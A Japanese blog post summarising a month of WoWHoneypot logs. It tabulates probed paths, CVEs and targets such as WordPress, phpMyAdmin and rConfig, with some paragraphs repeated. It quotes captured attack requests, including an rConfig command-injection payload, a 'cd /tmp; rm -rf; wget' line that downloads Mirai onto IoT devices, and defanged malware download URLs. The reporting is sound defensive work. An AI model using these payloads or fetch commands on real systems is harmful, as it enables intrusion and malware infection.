【ハニーポット簡易分析】Honeypot簡易分析(10/11-11/16)
かなり、久々の更新となってしました。
一部、こちらの手違いでログの欠損が発生してまい、WoWHoneypotおよびHoneytrapのログがロストしてしまいましたので、WoWHoneypotのみの更新となります。
一部、こちらの手違いでログの欠損が発生してまい、WoWHoneypotおよびHoneytrapのログがロストしてしまいましたので、WoWHoneypotのみの更新となります。
◾️WoWHoneypot
<国別検知数および検知数>
※ログの取り込みミスで結構な期間ロストしていました。。。
<検知パス一覧>
target | count |
WordPress | 1639 |
- | 876 |
FreePBX | 438 |
txt | 116 |
Admin config | 113 |
Tomcat | 76 |
phpMyAdmin | 43 |
ThinkPHP | 41 |
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | 32 |
Unauthorized Relay | 14 |
Webshell | 11 |
phpMyAdmin | 10 |
a2billing | 8 |
Nmap | 7 |
D-Link DIR-850L | 3 |
consul | 3 |
Vmware | 2 |
.env file | 1 |
ASUS | 1 |
Drupal | 1 |
IPC | 1 |
Login Page | 1 |
MySQL | 1 |
Outlook 2016 Autodiscover | 1 |
Scannero | 1 |
Trane Tracer SC | 1 |
rConfig | 1 |
<rConfig の脆弱性>
CVE-2019-16663 および CVE-2019-16662
検知ペイロード
/install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum #
→rootuname=;以降のペイロードが実行されます。今回のコマンドはechoコマンドでhellorconfigのmd5のハッシュ値を求めるものとなります。ハッシュ値が表示される=攻撃成功なので、ハッシュ値が表示されれば、その後の攻撃に移行すると推測されます。
<マルウェアダウンロード>
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→Downloader
リクエスト:GET /FxCodeShell.jsp
Webshellにてダウンローダをインストールさせることを狙った攻撃
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→Mirai亜種 tsunami
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→Downloader
リクエスト:GET /FxCodeShell.jsp
Webshellにてダウンローダをインストールさせることを狙った攻撃
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→Mirai亜種 tsunami
リクエスト:GET /shell?cd+/tmp;rm+-rf+.t;wget マルウェアURL
MVPower DVRなどのIoT機器への攻撃を狙った通信であり、Mirai亜種への感染を狙ったものでした。(やはり、IoT系はMirai系のダウンロードが多いですね。。。)
MVPower DVRなどのIoT機器への攻撃を狙った通信であり、Mirai亜種への感染を狙ったものでした。(やはり、IoT系はMirai系のダウンロードが多いですね。。。)
<検知パス一覧>
path | target | CVE | reference | count |
/editBlackAndWhiteList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | - | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py | 8 |
/myadmin/scripts/setup.php | phpMyAdmin | - | - | 8 |
/pma/scripts/setup.php | phpMyAdmin | - | - | 8 |
/recordings/theme/main.css | FreePBX | - | - | 4 |
/recordings/theme/main.css | FreePBX | - | https://github.com/crazedr0m/FreePBX/blob/master/upgrades/2.8.1.md5 | 4 |
/admin/i18n/readme.txt | - | - | - | 2 |
/admin/i18n/readme.txt | txt | - | - | 2 |
/ | - | - | - | 1 |
/ index.php | - | - | - | 1 |
/ l.php | Webshell | - | - | 1 |
/ phpinfo.php | - | - | - | 1 |
/.env | .env file | - | - | 1 |
/// | - | - | - | 1 |
///wp-json/wp/v2/users/ | WordPress | - | - | 1 |
//MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
/Autodiscover/Autodiscover.xml | Outlook 2016 Autodiscover | - | - | 1 |
/FxCodeShell.jsp | Webshell | - | - | 1 |
/HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
/HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
/Login.htm | - | - | - | 1 |
/MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/Nmap/folder/check1573311458 | Nmap | - | - | 1 |
/Nmap/folder/check1573531681 | Nmap | - | - | 1 |
/NmapUpperCheck1573311458 | Nmap | - | - | 1 |
/NmapUpperCheck1573531681 | Nmap | - | - | 1 |
/Pages/login.htm | - | - | - | 1 |
/TP/public/index.php | ThinkPHP | - | - | 1 |
/a2billing/admin/Public/index.php | a2billing | - | http://www.asterisk2billing.org/ | 1 |
/a2billing/customer/templates/default/css/menu.css | FreePBX | - | https://n-lab.site/?p=494 | 1 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 1 |
/admin/config.php | Admin config | - | - | 1 |
/admin/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/admin/pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
/admin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/cgi-sys/defaultwebpage.cgi | - | - | - | 1 |
/cpanel | - | - | - | 1 |
/db/scripts/setup.php | phpMyAdmin | - | - | 1 |
/dbadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
/favicon.ico | - | - | - | 1 |
/get_webdavInfo.asp | ASUS RT-AC | CVE-2017-5892 | https://wwwsnightwatchcybersecuritycom.files.wordpress.com/2017/10/bsides_fall_2017.pdf | 1 |
/getip | - | - | - | 1 |
/index.php | - | - | - | 1 |
/install/lib/ajaxhandlers/ajaxserversettingschk.php | rConfig | CVE-2019-16663, CVE-2019-16662 | https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ | 1 |
/ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
/l.php | Webshell | - | - | 1 |
/login/ | Login Page | - | - | 1 |
/manager/html | Tomcat | - | - | 1 |
/manager/text/list | Tomcat | - | https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html | 1 |
/muieblackcat | Scanner | - | https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/ | 1 |
/mysql/scripts/setup.php | MySQL | - | - | 1 |
/mysqladmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/nice ports,/Trinity.txt.bak | Nmap | - | https://dragos.com/blog/industry-news/threat-hunting-with-python-part-2-detecting-nmap-behavior-with-bro-http-logs/ | 1 |
/nmaplowercheck1573311458 | Nmap | - | - | 1 |
/nmaplowercheck1573531681 | Nmap | - | - | 1 |
/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpinfo.php | - | - | - | 1 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/phpmyadmin/ | phpMyAdmin | - | - | 1 |
/phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// l.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// phpinfo.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//l.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpinfo.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/pmd/ index.php | phpMyAdmin | - | - | 1 |
/pmd/index.php | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
/scripts/setup.php | phpMyAdmin | - | - | 1 |
/sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
/shell | Webshell | - | - | 1 |
/user/register/ | Drupal | CVE-2018-7600 | https://www.orangeitems.com/entry/2018/04/14/084205 | 1 |
/v1/agent/self | consul | - | https://github.com/hashicorp/consul/blob/master/api/agent.go | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 1 |
/wp-admin/ | WordPress | - | - | 1 |
/wp-login.php | WordPress | - | - | 1 |
/xmlrpc.php | WordPress | - | - | 1 |
1 | ||||
cn.bing.com:443 | Unauthorized Relay | - | - | 1 |
hxxp://112[.]124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
hxxp://112[.]35.63.31:8088/index.php | Unauthorized Relay | - | - | 1 |
hxxp://112[.]35.66.7:8088/index.php | Unauthorized Relay | - | - | 1 |
hxxp://123[.]125.114.144/ | Unauthorized Relay | - | - | 1 |
hxxp://www.123cha.com/ | Unauthorized Relay | - | - | 1 |
hxxp://www.ip.cn/ | Unauthorized Relay | - | - | 1 |
www[.]baidu.com:443 | Unauthorized Relay | - | - | 1 |
www[.]ip.cn:443 | Unauthorized Relay | - | - | 1 |
xui[.]ptlogin2.qq.com:443 | Unauthorized Relay | - |
- |
1 |
以上となります。